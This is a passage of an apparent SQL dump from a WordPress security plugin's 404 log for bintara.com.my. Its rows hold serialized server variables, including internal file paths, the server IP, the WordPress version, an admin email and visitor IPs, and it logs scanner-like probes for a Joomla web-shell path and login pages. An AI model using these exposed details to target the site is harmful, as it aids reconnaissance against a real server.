taramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKB3kXpgmG5P@iB8kXYwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065479.5956\";s:12:\"REQUEST_TIME\";s:10:\"1569065479\";}}','notice','2019-09-21 11:31:21','2019-09-21 11:31:20',17799088,19289208,'https://bintara.com.my/wp/wp-login.php',1,0,'89.44.32.18'),(26814,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569150243.1051208972930908203125\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569150243.1051208972930908203125\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569150243.1051208972930908203125\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569150243.1051208972930908203125\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"35726\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569150243.1051208972930908203125\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYdVI8@@KQJCXdfc6LAOlQAAAdQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYdVI8@@KQJCXdfc6LAOlQAAAdQ\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"35726\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYdVI8@@KQJCXdfc6LAOlQAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569151222.1906\";s:12:\"REQUEST_TIME\";s:10:\"1569151222\";}}','notice','2019-09-22 11:20:31','2019-09-22 11:20:22',30780376,31032096,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569150243.1051208972930908203125',1,0,'103.6.198.69'),(26929,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/2\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpvCYhQ4pD4smMfGATvtgAAAIA\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"39492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpvCYhQ4pD4smMfGATvtgAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353481.3038\";s:12:\"REQUEST_TIME\";s:10:\"1569353481\";}}','notice','2019-09-24 19:31:22','2019-09-24 19:31:21',30752600,32562760,'https://bintara.com.my/2',1,0,'149.202.215.42'),(26927,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpt4BaIaq52cc-9XMJ@RwAAABc\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"38930\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpt4BaIaq52cc-9XMJ@RwAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353185.0407\";s:12:\"REQUEST_TIME\";s:10:\"1569353185\";}}','notice','2019-09-24 19:26:26','2019-09-24 19:26:25',30752520,32568320,'https://bintara.com.my/3',1,0,'149.202.215.42'),(26928,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:32:\"https://bintara.com.my/wp-admin/\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpuVyC9qkCozCNGajGheAAAAUY\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpuVyC9qkCozCNGajGheAAAAUY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"36940\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpuVyC9qkCozCNGajGheAAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353303.8507\";s:12:\"REQUEST_TIME\";s:10:\"1569353303\";}}','notice','2019-09-24 19:28:25','2019-09-24 19:28:24',30759640,32578280,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'149.202.215.42'),(26926,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpt1CC9qkCozCNGajGhYAAAAUg\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"60603\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpt1CC9qkCozCNGajGhYAAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353172.6017\";s:12:\"REQUEST_TIME\";s:10:\"1569353172\";}}','notice','2019-09-24 19:26:14','2019-09-24 19:26:12',30752520,32568320,'https://bintara.com.my/2',1,0,'149.202.215.42'),(26925,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"54681\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpnaBaIaq52cc-9XMJ8DQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569351528.4965\";s:12:\"REQUEST_TIME\";s:10:\"1569351528\";}}','notice','2019-09-24 18:58:50','2019-09-24 18:58:48',31309176,33120416,'https://bintara.com.my/?page_id=18',1,0,'223.206.242.226'),(26924,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/libraries/joomla/template/mide.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"212.48.89.54\";s:11:\"REMOTE_PORT\";s:5:\"35572\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:10:\"SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31: